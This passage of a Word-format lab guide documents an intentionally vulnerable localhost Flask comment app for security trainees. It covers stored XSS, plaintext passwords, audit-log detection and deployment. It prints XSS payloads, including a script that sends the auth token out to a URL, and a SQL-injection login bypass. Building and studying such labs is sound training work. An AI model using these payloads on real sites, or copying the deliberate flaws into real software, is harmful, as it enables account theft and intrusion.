    <w:bookmarkStart w:id="18" w:name="stored-xss-comment-body"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Stored XSS — comment body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sink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static/app.js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class="meta"&gt;&lt;b&gt;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escapeText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&lt;/b&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;span class="ts"&gt;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escapeText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&lt;/span&gt;&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div class="body"&gt;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← body NOT escaped</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Payloads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(post as a comment while signed in):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3"/>
        <w:gridCol w:w="25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 src=x onerror="alert('XSS by '+document.domain)"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pop-up alert when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user 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&lt;script&gt;fetch('http://127.0.0.1:5050/?stolen='+localStorage.getItem('token'))&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exfiltrates the auth token over HTTP.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&lt;style&gt;body{background:red}&lt;/style&gt;&lt;h1&gt;pwned&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DOM defacement / phishing pretext.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the server stores the body verbatim, and the SPA renders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it with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 Every visitor that loads the wall executes whatever</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTML/JS the attacker stashed in a comment — classic stored XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Audit log signature:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">event=comment_posted xss_suspected=true body_preview="&lt;img src=x onerror=alert(1)&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="plaintext-password-storage"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 Plaintext password storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passwords are inserted unmodified into</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">users.password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db.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT INTO users (username, password) VALUES (?,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(username, password))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combined with vuln 3.2, an attacker drops every password into the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comment list with one search-box payload. There’s no hashing, no salting,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and no peppering.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:id="20" w:name="X90e6555114b388559277d617942d8fa6aaf7996"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.5 Bonus weaknesses (not headlined, but worth pointing out)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 state lives entirely client-side.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“token”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is just</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the username — clients can forge it. Try editing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage.token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in DevTools.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CSRF protection.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Comments are accepted on a JSON POST with no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">origin or token check.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Verbose error responses.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL errors and the executed query are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">returned to the client (great for the demo, terrible in production).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CSP,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X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">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Referrer-Policy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udit-logging"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Audit logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every API call writes a single-line</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">logfmt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">record to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(rotating, 2 MB × 3 backups) and to stdout. Override the path with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN_DEMO_LOG=/path/to/file.log python app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Format — key=value pairs, values containing whitespace or quotes are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">themselves quoted, booleans are lowercase:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ts=2026-04-27T10:36:11.123456Z level=info event=login_success ip=127.0.0.1 method=POST path=/api/login ua="Mozilla/5.0..." user=admin attempted_user="admin' --" admin=true sqli_suspected=true sql="SELECT id, username, is_admin FROM users WHERE username = 'admin' --' AND password = 'anything'"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="events-emitted"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Events emitted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72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extra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login_success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attempted_user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sqli_suspected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login_failure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login_sql_error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register_success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register_failure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missing_fields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duplicate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comment_list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comment_search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sqli_suspected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comment_search_sql_error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comment_posted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xss_suspected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comment_post_failure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empty_body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</w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every record carries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(UTC ISO8601),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(honours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),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ua</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sqli_suspected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xss_suspected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are crude heuristics (presence of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onerror=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, etc.) — useful for trainees to verify their attack landed in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the audit trail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Passwords are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logged — only usernames (which double</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as the SQLi vector) and the executed SQL appear in the trail.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="bash-parsing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bash parsing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A worked example lives in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">parse_logs.sh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./parse_logs.sh                # uses ./access.log</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">./parse_logs.sh /var/log/x.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It produces an event-count summary, login-failure list, SQLi/XSS-flagged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">events, and top source IPs. One-liners for ad-hoc digging:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># count login failures by IP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'event=login_failure'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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'ip=[^ ]+'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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># show every SQLi-suspected login attempt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'event=login_success'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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'sqli_suspected=true'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># pull all attempted XSS payloads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'event=comment_posted'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> access.log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'xss_suspected=true'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's/.* body_preview=("[^"]*"|[^ ]+).*/\1/'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deploying-on-another-machine"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Deploying on another machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The whole lab fits in one folder, has one runtime dependency (Flask), and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binds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only. No Docker, no DB server, no build step.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="prerequisites"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Prerequisites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Python 3.10+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(3.11 / 3.12 / 3.13 all tested)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pip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venv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(both ship with Python on most distros and macOS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A modern browser (Chrome, Firefox, Safari, Edge)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Free TCP port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5050</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on localhost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Default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5000, because macOS AirPlay Receiver intercepts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that port and returns 403s. Change the port at the bottom of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if 5050 is also taken.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="get-the-files-onto-the-target-machine"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Get the files onto the target machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy the entire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vuln-demo/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">folder. Any of these works:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># rsync (preferred for over-the-wire copy)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vuln-demo/ user@host:/opt/vuln-demo/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># scp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vuln-demo user@host:/opt/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># tarball / USB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czf vuln-demo.tgz vuln-demo/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ... move it ...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vuln-demo.tgz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The folder is fully self-contained —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parse_logs.sh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. Don’t ship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vuln.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; they’re regenerated on first run.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="28" w:name="install-and-run"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Install and run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">macOS / Linux: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vuln-demo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vuln-demo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python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Expected startup output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*** Vulnerable demo app — localhost only ***</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    http://127.0.0.1:5050</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Seeded users:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      alice / password123</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      bob   / hunter2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      admin / S3cretAdmin!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Audit log: /path/to/vuln-demo/access.log</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Serving Flask app 'app'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Running on http://127.0.0.1:5050</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5050</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in a browser. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Comment Wall”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">should load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with three seeded comments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="smoke-test-from-the-command-line"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Smoke-test from the command line</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 200 OK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http://127.0.0.1:5050/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># legit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http://127.0.0.1:5050/api/login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'{"username":"alice","password":"password123"}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SQLi auth bypass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http://127.0.0.1:5050/api/login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username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admin' --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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">./parse_logs.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to confirm the audit log captured both attempts.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="resetting-the-lab-between-runs"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Resetting the lab between runs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Wipe DB (users + comments):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm vuln.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— recreated on next start.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Wipe logs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm access.log access.log.*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 reset (no virtualenv):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm -rf .venv vuln.db access.log*</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="common-deployment-problems"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 Common deployment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5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 Forbidden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on macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Port 5000 is grabbed by AirPlay Receiver. Use port 5050 (the default) or change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 already in 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OSError: [Errno 48]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Another process is on 5050 —</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">lsof -i :5050</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then kill, or pick another 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shows old comments after wipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hard-reload (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Cmd/Ctrl-Shift-R</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) and clear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(DevTools → Application → Storage).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ModuleNotFoundError: No module named 'flask'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The venv isn’t active. Re-activate with</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">source .venv/bin/activate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Activate.ps1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to expose to a colleague on the same LAN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Don’t.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">This app is intentionally vulnerable. Use a screen-share or set up DVWA in a VM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="X6067c6d648696cee0261361c4520ef4515c227a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.7 Optional: run under the included Claude Code preview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you use Claude Code with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preview_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MCP tools, an entry already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../.claude/launch.json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vuln-demo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"vuln-demo",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
